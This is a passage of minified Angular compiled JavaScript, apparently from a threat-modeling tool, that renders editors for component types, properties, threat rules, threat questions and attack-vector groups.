"),C(2),at("matTooltip",re(11,11,"general.Add")),C(5),V("ngForOf",e.selectedComponentType.Properties),C(6),V("ngIf",null==e.selectedComponentType.Properties?null:e.selectedComponentType.Properties.includes(e.selectedProperty))}}function sft(t,a){1&t&&(m(0,"div",23),s(1),oe(2,"translate"),oe(3,"translate"),u()),2&t&&(C(1),za("",re(2,2,"properties.Restrictions"),": ",re(3,4,"pages.config.noRestrictions"),""))}function cft(t,a){if(1&t&&(m(0,"div",23),s(1),oe(2,"translate"),u()),2&t){const e=B().$implicit,i=B(4);C(1),za("",re(2,2,"properties.Restrictions"),": ",i.GetComponentRestrictionsCount(e),"")}}function lft(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",21),he("click",function(){const r=be(e).$implicit;return Me(B(4).selectedThreatRule=r)})("contextmenu",function(n){const c=be(e).$implicit;return Me(B(4).OpenContextMenu(n,c))}),s(1,"\n                  "),m(2,"mat-icon",22),s(3,"arrow_right"),u(),s(4,"\n                  "),m(5,"div",23),s(6),u(),s(7,"\n                  "),ne(8,sft,4,6,"div",35),s(9,"\n                  "),ne(10,cft,3,4,"div",35),s(11,"\n                  "),m(12,"button",24),he("click",function(){const r=be(e).$implicit;return Me(B(4).DeleteThreat(r))}),oe(13,"translate"),m(14,"mat-icon"),s(15,"delete"),u()(),s(16,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-light",i.selectedThreatRule===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedThreatRule===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.Name),C(2),V("ngIf",0==i.GetComponentRestrictionsCount(e)),C(2),V("ngIf",i.GetComponentRestrictionsCount(e)>0),C(2),at("matTooltip",re(13,9,"general.Delete"))}}function dft(t,a){if(1&t){const e=Ye();s(0,"\n          "),m(1,"div",14),s(2,"\n            "),m(3,"div",15),s(4,"\n              "),m(5,"mat-list",16),he("cdkDropListDropped",function(n){be(e);const r=B(3);return Me(r.dropThreat(n,r.typeThreats))}),s(6,"\n                "),m(7,"div",17),s(8),oe(9,"translate"),m(10,"button",18),he("click",function(){return be(e),Me(B(3).AddThreat())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n                "),ne(15,lft,17,11,"mat-list-item",19),s(16,"\n              "),u(),s(17,"\n            "),u(),s(18,"\n            "),m(19,"div",20),s(20,"\n              "),it(21,"app-threat-rule",34),s(22,"\n            "),u(),s(23,"\n          "),u(),s(24,"\n        ")}if(2&t){const e=B(3);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedComponentType.Name," ",re(9,12,"general.Threats")," "),C(2),at("matTooltip",re(11,14,"general.Add")),C(5),V("ngForOf",e.typeThreats),C(6),V("node",e.selectedNode)("threatRule",e.selectedThreatRule)("canEdit",!0)("canEditName",!0)}}function mft(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",21),he("click",function(){const r=be(e).$implicit;return Me(B(4).selectedQuestion=r)})("contextmenu",function(n){const c=be(e).$implicit;return Me(B(4).OpenContextMenu(n,c))}),s(1,"\n                    "),m(2,"mat-icon",22),s(3,"arrow_right"),u(),s(4,"\n                    "),m(5,"div",23),s(6),u(),s(7,"\n                    "),m(8,"div",23),s(9),oe(10,"translate"),u(),s(11,"\n                    "),m(12,"button",38),he("click",function(){const r=be(e).$implicit;return Me(B(4).DuplicateQuestion(r))}),oe(13,"translate"),m(14,"mat-icon"),s(15,"content_copy"),u()(),s(16,"\n                    "),m(17,"button",24),he("click",function(){const r=be(e).$implicit;return Me(B(4).DeleteQuestion(r))}),oe(18,"translate"),m(19,"mat-icon"),s(20,"delete"),u()(),s(21,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-light",i.selectedQuestion===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedQuestion===e&&i.theme.IsDarkMode),at("matTooltip",null==e?null:e.Name),C(6),ke(e.Name),C(3),ke(re(10,9,i.GetOptionTypeName(e.OptionType))),C(3),at("matTooltip",re(13,11,"general.Duplicate")),C(5),at("matTooltip",re(18,13,"general.Delete"))}}function uft(t,a){if(1&t&&(bt(0),s(1,"\n                  "),m(2,"div",39),s(3,"\n                    "),it(4,"app-threat-question",40),s(5,"\n                  "),u(),s(6,"\n                "),Mt()),2&t){const e=B(4);C(4),V("threatQuestion",e.selectedQuestion)}}function hft(t,a){if(1&t){const e=Ye();s(0,"\n            "),m(1,"div",14),s(2,"\n              "),m(3,"div",15),s(4,"\n                "),m(5,"mat-list",16),he("cdkDropListDropped",function(n){be(e);const r=B(3);return Me(r.dropQuestion(n,r.GetQuestions()))}),s(6,"\n                  "),m(7,"div",17),s(8),oe(9,"translate"),m(10,"button",36),he("click",function(){return be(e),Me(B(3).AddQuestion())}),oe(11,"translate"),m(12,"mat-icon",37),s(13,"add"),u()()(),s(14,"\n                  "),ne(15,mft,22,15,"mat-list-item",19),s(16,"\n                "),u(),s(17,"\n              "),u(),s(18,"\n              "),m(19,"div",20),s(20,"\n                "),ne(21,uft,7,1,"ng-container",6),s(22,"\n              "),u(),s(23,"\n            "),u(),s(24,"\n          ")}if(2&t){const e=B(3);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),ke(re(9,8,"general.ThreatQuestion")),C(2),at("matTooltip",re(11,10,"general.Add")),C(5),V("ngForOf",e.GetQuestions()),C(6),V("ngIf",e.selectedQuestion)}}function fft(t,a){if(1&t){const e=Ye();s(0,"\n          "),m(1,"div",41),s(2,"\n            "),m(3,"mat-form-field",26),s(4,"\n              "),m(5,"mat-label"),s(6),oe(7,"translate"),u(),s(8,"\n              "),m(9,"input",27),he("ngModelChange",function(n){return be(e),Me(B(3).newThreat.name=n)}),u(),s(10,"\n            "),u(),s(11,"\n            "),it(12,"br"),s(13,"\n            "),m(14,"mat-form-field",26),s(15,"\n              "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n              "),m(20,"input",27),he("ngModelChange",function(n){return be(e),Me(B(3).newThreat.property=n)}),u(),s(21,"\n            "),u(),s(22,"\n            "),m(23,"mat-checkbox",42),he("ngModelChange",function(n){return be(e),Me(B(3).newThreat.threatGen=n)}),s(24,"Threat generated when Property == "),u(),s(25,"\n            "),it(26,"br"),s(27,"\n            "),m(28,"mat-form-field",7),s(29,"\n              "),m(30,"mat-label"),s(31),oe(32,"translate"),u(),s(33,"\n              "),m(34,"input",27),he("ngModelChange",function(n){return be(e),Me(B(3).newThreat.question=n)}),u(),s(35,"\n            "),u(),s(36,"\n            "),m(37,"button",43),he("click",function(){return be(e),Me(B(3).AddNewThreat())}),s(38),oe(39,"translate"),u(),s(40,"\n            "),m(41,"mat-checkbox",44),he("ngModelChange",function(n){return be(e),Me(B(3).newThreat.yesResult=n)}),s(42,"Answering the question with Yes sets the property to"),u(),s(43,"\n          "),u(),s(44,"\n        ")}if(2&t){const e=B(3);C(6),ke(re(7,18,"general.Threat")),C(3),at("matTooltip",e.newThreat.name),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.newThreat.name),C(8),ke(re(18,20,"general.Property")),C(3),at("matTooltip",e.newThreat.property),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.newThreat.property),C(3),V("disabled",""==e.newThreat.property)("ngModel",e.newThreat.threatGen),C(8),ke(re(32,22,"properties.Question")),C(3),at("matTooltip",e.newThreat.question),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.newThreat.question),C(3),V("disabled",""==e.newThreat.name||""==e.newThreat.question),C(1),ke(re(39,24,"general.Add")),C(3),V("disabled",""==e.newThreat.property)("ngModel",e.newThreat.yesResult)}}function pft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",7),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"textarea",8),he("ngModelChange",function(n){return be(e),Me(B(2).selectedComponentType.Description=n)}),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"mat-checkbox",9),he("ngModelChange",function(n){return be(e),Me(B(2).selectedComponentType.IsActive=n)}),s(12),oe(13,"translate"),u(),s(14,"\n    "),m(15,"mat-checkbox",10),he("ngModelChange",function(n){return be(e),Me(B(2).selectedComponentType.IsThirdParty=n)}),s(16),oe(17,"translate"),u(),s(18,"\n    \n    "),m(19,"mat-tab-group",11),he("selectedIndexChange",function(n){return be(e),Me(B(2).SetSelectedTabIndex(n))}),s(20,"\n      "),m(21,"mat-tab",12),oe(22,"translate"),s(23,"\n          "),ne(24,rft,25,13,"ng-template",13),s(25,"\n      "),u(),s(26,"\n      "),m(27,"mat-tab",12),oe(28,"translate"),s(29,"\n        "),ne(30,dft,25,16,"ng-template",13),s(31,"\n      "),u(),s(32,"\n      "),m(33,"mat-tab",12),oe(34,"translate"),s(35,"\n          "),ne(36,hft,25,12,"ng-template",13),s(37,"\n      "),u(),s(38,"\n      "),m(39,"mat-tab",12),oe(40,"translate"),s(41,"\n        "),ne(42,fft,45,26,"ng-template",13),s(43,"\n    "),u(),s(44,"\n    "),u(),s(45,"\n  "),Mt()}if(2&t){const e=B(2);let i;C(5),ke(re(6,15,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedComponentType.Description),C(3),V("ngModel",e.selectedComponentType.IsActive),C(1),ke(re(13,17,"properties.IsActive")),C(3),V("ngModel",e.selectedComponentType.IsThirdParty),C(1),ke(re(17,19,"properties.IsThirdParty")),C(3),V("selectedIndex",e.GetSelectedTabIndex()),C(2),Kc("label","",re(22,21,"general.Properties")," (",null==e.selectedComponentType||null==e.selectedComponentType.Properties?null:e.selectedComponentType.Properties.length,")"),C(6),Kc("label","",re(28,23,"general.Threats")," (",null==e.typeThreats?null:e.typeThreats.length,")"),C(6),Kc("label","",re(34,25,"properties.Questions")," (",null==(i=e.GetQuestions())?null:i.length,")"),C(6),at("label",re(40,27,"general.Wizard"))}}function _ft(t,a){if(1&t&&(m(0,"div",5),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),ne(5,pft,46,29,"ng-container",6),s(6,"\n"),u()),2&t){const e=B();C(3),ke(e.selectedNode.name()),C(2),V("ngIf",e.selectedComponentType)}}function gft(t,a){if(1&t&&(m(0,"span",47),s(1),oe(2,"translate"),u()),2&t){const e=B(2).item;C(1),ke(re(2,1,e.DisplayName))}}function Cft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n      "),ne(2,gft,3,3,"span",45),s(3," \n      "),m(4,"button",46),he("click",function(){be(e);const n=B().item;return Me(B().OnMoveUpProperty(n))}),s(5,"\n        "),m(6,"mat-icon"),s(7,"arrow_upward"),u(),s(8,"\n        "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n      "),u(),s(13,"\n      "),m(14,"button",46),he("click",function(){be(e);const n=B().item;return Me(B().OnMoveDownProperty(n))}),s(15,"\n        "),m(16,"mat-icon"),s(17,"arrow_downward"),u(),s(18,"\n        "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n      "),u(),s(23,"\n    "),Mt()}if(2&t){const e=B().item;C(2),V("ngIf",e),C(8),ke(re(11,3,"nav-tree.moveUp")),C(10),ke(re(21,5,"nav-tree.moveDown"))}}function yft(t,a){if(1&t&&(m(0,"span",47),s(1),u()),2&t){const e=B(2).item;C(1),ke(e.Name)}}function bft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n      "),ne(2,yft,2,1,"span",45),s(3," \n      "),m(4,"button",46),he("click",function(){be(e);const n=B().item;return Me(B().OnMoveUpThreatRule(n))}),s(5,"\n        "),m(6,"mat-icon"),s(7,"arrow_upward"),u(),s(8,"\n        "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n      "),u(),s(13,"\n      "),m(14,"button",46),he("click",function(){be(e);const n=B().item;return Me(B().OnMoveDownThreatRule(n))}),s(15,"\n        "),m(16,"mat-icon"),s(17,"arrow_downward"),u(),s(18,"\n        "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n      "),u(),s(23,"\n    "),Mt()}if(2&t){const e=B().item;C(2),V("ngIf",e),C(8),ke(re(11,3,"nav-tree.moveUp")),C(10),ke(re(21,5,"nav-tree.moveDown"))}}function Mft(t,a){if(1&t&&(m(0,"span",47),s(1),u()),2&t){const e=B(2).item;C(1),ke(e.Name)}}function vft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n      "),ne(2,Mft,2,1,"span",45),s(3," \n      "),m(4,"button",46),he("click",function(){be(e);const n=B().item;return Me(B().OnMoveUpQuestion(n))}),s(5,"\n        "),m(6,"mat-icon"),s(7,"arrow_upward"),u(),s(8,"\n        "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n      "),u(),s(13,"\n      "),m(14,"button",46),he("click",function(){be(e);const n=B().item;return Me(B().OnMoveDownQuestion(n))}),s(15,"\n        "),m(16,"mat-icon"),s(17,"arrow_downward"),u(),s(18,"\n        "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n      "),u(),s(23,"\n    "),Mt()}if(2&t){const e=B().item;C(2),V("ngIf",e),C(8),ke(re(11,3,"nav-tree.moveUp")),C(10),ke(re(21,5,"nav-tree.moveDown"))}}function Aft(t,a){if(1&t&&(s(0,"\n    "),ne(1,Cft,24,7,"ng-container",6),s(2,"\n    "),ne(3,bft,24,7,"ng-container",6),s(4,"\n    "),ne(5,vft,24,7,"ng-container",6),s(6,"\n  ")),2&t){const e=a.item,i=B();C(1),V("ngIf",i.IsProperty(e)),C(2),V("ngIf",i.IsThreatRule(e)),C(2),V("ngIf",i.IsThreatQuestion(e))}}let Tft=(()=>{class t extends xa{constructor(e,i,n,r,c){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,this.locStorage=c,this.newThreat={name:"",question:"",property:"",threatGen:!1,yesResult:!0},this.menuTopLeftPosition={x:"0",y:"0"},i.ConfigChanged.subscribe(d=>this.createNodes())}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e,this.selectedQuestion=null,this.selectedProperty=null,this.selectedThreatRule=null}get selectedComponentType(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}get typeThreats(){return this.selectedComponentType?this.dataService.Config.GetThreatRules().filter(e=>{var i;return(null===(i=e.ComponentRestriction)||void 0===i?void 0:i.componentTypeID)==this.selectedComponentType.ID}):[]}get selectedQuestion(){return this._selectedQuestion}set selectedQuestion(e){this._selectedQuestion=e}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}IsProperty(e){return"DisplayName"in e&&"ID"in e}IsThreatRule(e){return e instanceof Fp}IsThreatQuestion(e){return e instanceof iM}OnMoveUpProperty(e){let i=this.selectedComponentType.Properties;if(0!=i.findIndex(n=>n.ID==e.ID)){let n=i.findIndex(r=>r.ID==e.ID);i.splice(n,0,i.splice(n-1,1)[0])}}OnMoveDownProperty(e){let i=this.selectedComponentType.Properties;if(i.findIndex(n=>n.ID==e.ID)!=i.length-1){let n=i.findIndex(r=>r.ID==e.ID);i.splice(n,0,i.splice(n+1,1)[0])}}OnMoveUpThreatRule(e){let i=this.dataService.Config.GetThreatRules(),n=this.typeThreats,r=n.findIndex(c=>c.ID==e.ID);if(0!=r){const c=i.findIndex(T=>T.ID==e.ID),d=i.findIndex(T=>T.ID==n[r-1].ID);this.dataService.Config.MoveItemInThreatRules(c,d)}}OnMoveDownThreatRule(e){let i=this.dataService.Config.GetThreatRules(),n=this.typeThreats,r=n.findIndex(c=>c.ID==e.ID);if(r!=n.length-1){const c=i.findIndex(T=>T.ID==e.ID),d=i.findIndex(T=>T.ID==n[r+1].ID);this.dataService.Config.MoveItemInThreatRules(c,d)}}OnMoveUpQuestion(e){let i=this.dataService.Config.GetThreatQuestions(),n=this.GetQuestions(),r=n.findIndex(c=>c.ID==e.ID);if(0!=r){const c=i.findIndex(T=>T.ID==e.ID),d=i.findIndex(T=>T.ID==n[r-1].ID);this.dataService.Config.MoveItemInThreatQuestions(c,d)}}OnMoveDownQuestion(e){let i=this.dataService.Config.GetThreatQuestions(),n=this.GetQuestions(),r=n.findIndex(c=>c.ID==e.ID);if(r!=n.length-1){const c=i.findIndex(T=>T.ID==e.ID),d=i.findIndex(T=>T.ID==n[r+1].ID);this.dataService.Config.MoveItemInThreatQuestions(c,d)}}AddProperty(){let e=[];e.push(...this.selectedComponentType.Properties.map(n=>n.DisplayName));let i=Gi.FindUniqueName("New Property",e);this.selectedComponentType.Properties.push({DisplayName:i,ID:Fo(),Tooltip:"",HasGetter:!1,Editable:!0,Type:Ii.CheckBox}),this.selectedProperty=this.selectedComponentType.Properties[this.selectedComponentType.Properties.length-1]}DeleteProperty(e){let i=this.selectedComponentType.Properties.indexOf(e);i>=0&&this.selectedComponentType.Properties.splice(i,1)}GetElementPropertyValue(e){let i=e.DefaultValue;return e.Type==Ii.ProtocolSelect?"[ ]":e.Type==Ii.LowMediumHighSelect?An.ToString(i):i}GetPropertyTypes(){return bG.GetMappableTypeNames()}AddThreat(){let e=this.dataService.Config.CreateThreatRule(this.dataService.Config.ComponentThreatRuleGroups,on.Component);e.ComponentRestriction.componentTypeID=this.selectedComponentType.ID,e.Name=Gi.FindUniqueName(this.selectedComponentType.Name,this.dataService.Config.GetThreatRules().map(i=>i.Name)),this.selectedThreatRule=e}DeleteThreat(e){this.dataService.Config.DeleteThreatRule(e),e==this.selectedThreatRule&&(this.selectedThreatRule=null)}GetComponentRestrictionsCount(e){var i;let n=0;return!(null===(i=e.ComponentRestriction)||void 0===i)&&i.DetailRestrictions&&e.ComponentRestriction.DetailRestrictions.forEach(r=>{(r.RestType==ya.Property&&r.PropertyRest||r.RestType==ya.PhysicalElement&&r.PhyElementRest)&&(n+=1)}),n}AddQuestion(){let e=this.dataService.Config.CreateThreatQuestion();return e.ComponentType=this.selectedComponentType,this.selectedQuestion=e,e}DuplicateQuestion(e){let i=this.AddQuestion();i.CopyFrom(e.Data),i.Name+="-Copy"}DeleteQuestion(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(this.dataService.Config.DeleteThreatQuestion(e),this.selectedQuestion=null)})}AddNewThreat(){var e;this.AddThreat(),this.selectedThreatRule.Name=this.newThreat.name,this.AddQuestion(),this.selectedQuestion.Name=this.newThreat.name,this.selectedQuestion.Question=this.newThreat.question,(null===(e=this.newThreat.property)||void 0===e?void 0:e.length)>0&&(this.AddProperty(),this.selectedProperty.DisplayName=this.newThreat.property,this.selectedProperty.Tooltip=this.newThreat.question,this.selectedThreatRule.ComponentRestriction.DetailRestrictions.push({IsOR:!0,Layer:0,RestType:ya.Property,PropertyRest:{ID:this.selectedProperty.ID,ComparisonType:cc.Equals,Value:this.newThreat.threatGen}}),this.selectedQuestion.Property=this.selectedProperty,this.newThreat.yesResult||(this.selectedQuestion.ChangesPerOption["general.Yes"].Value=!1,this.selectedQuestion.ChangesPerOption["general.No"].Value=!0)),this.newThreat={name:"",property:"",question:"",threatGen:!1,yesResult:!0}}GetQuestions(){return this.dataService.Config.GetThreatQuestions().filter(e=>e.ComponentType==this.selectedComponentType)}drop(e,i){Qs(i,e.previousIndex,e.currentIndex)}dropThreat(e,i){const n=this.dataService.Config.GetThreatRules().indexOf(i[e.previousIndex]),r=this.dataService.Config.GetThreatRules().indexOf(i[e.currentIndex]);this.dataService.Config.MoveItemInThreatRules(n,r)}dropQuestion(e,i){const n=this.dataService.Config.GetThreatQuestions().indexOf(i[e.previousIndex]),r=this.dataService.Config.GetThreatQuestions().indexOf(i[e.currentIndex]);this.dataService.Config.MoveItemInThreatQuestions(n,r)}GetOptionTypeName(e){return Pl.ToString(e)}GetSelectedTabIndex(){let e=this.locStorage.Get(si.PAGE_CONFIG_COMPONENTS_TAB_INDEX);return null!=e?e:0}SetSelectedTabIndex(e){this.locStorage.Set(si.PAGE_CONFIG_COMPONENTS_TAB_INDEX,e)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(c,d,T,k)=>{let q={name:()=>c.Name,canSelect:!0,data:c,canRename:!0,onRename:Y=>{c.Name=Y},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(c).subscribe(Y=>{Y&&(this.dataService.Config.DeleteMyComponentType(c),this.selectedNode==q&&(this.selectedNode=null),this.createNodes())})},canMoveUpDown:!0,onMoveUp:()=>{let Y=d.Data.myComponentTypeIDs;if(0!=Y.findIndex(te=>te==c.ID)){let te=Y.findIndex(pe=>pe==c.ID);Y.splice(te,0,Y.splice(te-1,1)[0]),T.children.splice(te,0,T.children.splice(te-1,1)[0])}},onMoveDown:()=>{let Y=d.Data.myComponentTypeIDs;if(Y.findIndex(te=>te==c.ID)!=Y.length-1){let te=Y.findIndex(pe=>pe==c.ID);Y.splice(te,0,Y.splice(te+1,1)[0]),T.children.splice(te,0,T.children.splice(te+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>k.children.filter(Y=>Y!=T),onMoveToGroup:Y=>{let te="myComponentTypeIDs";d.Data[te].splice(d.Data[te].indexOf(c.ID),1),Y.data.Data[te].push(c.ID),this.createNodes()}};return q},n=(c,d)=>{let T={name:()=>c.Name,canSelect:!1,data:c,canAdd:!0,onAdd:()=>{let k=this.dataService.Config.CreateMyComponentType(c);k.ComponentTypeID=this.componentType,k.IsActive=!0,this.createNodes(),this.selectedNode=this.FindNodeOfObject(k),this.selectedNode.isRenaming=!0},canRename:!0,onRename:k=>{c.Name=k},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(c).subscribe(k=>{k&&(this.dataService.Config.DeleteMyComponentTypeGroup(c),this.selectedNode==T&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let k=this.dataService.Config.GetMyComponentTypeGroups(c.ComponentTypeID);if(0!=k.findIndex(q=>q.ID==c.ID)){let q=k.findIndex(Y=>Y.ID==c.ID);k.splice(q,0,k.splice(q-1,1)[0]),d.children.splice(q,0,d.children.splice(q-1,1)[0])}},onMoveDown:()=>{let k=this.dataService.Config.GetMyComponentTypeGroups(c.ComponentTypeID);if(k.findIndex(q=>q.ID==c.ID)!=k.length-1){let q=k.findIndex(Y=>Y.ID==c.ID);k.splice(q,0,k.splice(q+1,1)[0]),d.children.splice(q,0,d.children.splice(q+1,1)[0])}}};return T},r={name:()=>this.translate.instant("pages.config."+(this.componentType==zr.Software?"Software":"Process")+"Components"),canSelect:!1,icon:this.componentType==zr.Software?"code":"policy",canAdd:!0,hasMenu:!0,onAdd:()=>{let c=this.dataService.Config.CreateMyComponentTypeGroup(this.componentType);this.createNodes(),this.selectedNode=this.FindNodeOfObject(c),this.selectedNode.isRenaming=!0},children:[]};this.dataService.Config&&this.dataService.Config.GetMyComponentTypeGroups(this.componentType).forEach(c=>{let d=n(c,r);c.Types.forEach(T=>d.children.push(i(T,c,d,r))),r.children.push(d)}),this.Nodes.push(r),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-components"]],viewQuery:function(e,i){if(1&e&&Mi(tft,5),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first)}},inputs:{selectedNode:"selectedNode",componentType:"componentType"},features:[ci],decls:11,vars:6,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["ctxMenu","matMenuTrigger"],["rightMenu","matMenu"],["matMenuContent",""],[2,"margin-left","10px","margin-right","10px"],[4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["color","primary",3,"ngModel","ngModelChange"],["color","primary",2,"margin-left","15px",3,"ngModel","ngModelChange"],[3,"selectedIndex","selectedIndexChange"],[3,"label"],["matTabContent",""],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click","contextmenu",4,"ngFor","ngForOf"],[1,"column2"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click","contextmenu"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px"],["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["matInput","","type","text",3,"spellcheck","ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[3,"value"],[3,"node","threatRule","canEdit","canEditName"],["mat-line","",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[2,"margin-left","15px"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","0px",3,"matTooltip","click"],[2,"margin","10px 0 0 10px"],[3,"threatQuestion"],[2,"margin-top","10px"],["color","primary","labelPosition","before",2,"margin-left","10px",3,"disabled","ngModel","ngModelChange"],["mat-raised-button","",2,"float","right","margin-right","5px",3,"disabled","click"],["color","primary","labelPosition","before",3,"disabled","ngModel","ngModelChange"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"click"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(ne(0,_ft,7,2,"div",0),s(1,"\n"),it(2,"div",1,2),s(4," \n"),m(5,"mat-menu",null,3),s(7," \n  "),ne(8,Aft,7,3,"ng-template",4),s(9," \n"),u(),s(10," ")),2&e){const n=Ti(6);V("ngIf",i.selectedNode),C(2),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,an,Ta,Ea,Sd,kd,oa,br,da,nn,un,jr,Nr,yr,qh,Mu,Uh,Go,Xa,ts,is,Or,Lr,rc,Xo,qo,po,el,Pa,qp,EZ,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}']}),t})();function Eft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",4),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"textarea",5),he("ngModelChange",function(n){return be(e),Me(B(2).selectedAttackVectorGroup.Description=n)}),u(),s(9,"\n    "),u(),s(10,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,3,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedAttackVectorGroup.Description)}}function Dft(t,a){if(1&t&&(m(0,"div",1),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),ne(5,Eft,11,5,"ng-container",2),s(6,"\n  "),it(7,"app-attack-vector",3),s(8,"\n"),u()),2&t){const e=B();C(3),ke(e.selectedNode.name()),C(2),V("ngIf",e.selectedAttackVectorGroup),C(2),V("attackVector",e.selectedAttackVector)}}let xft=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,i.ConfigChanged.subscribe(c=>this.createNodes())}get selectedAttackVectorGroup(){var e;return(null===(e=this.selectedNode)||void 0===e?void 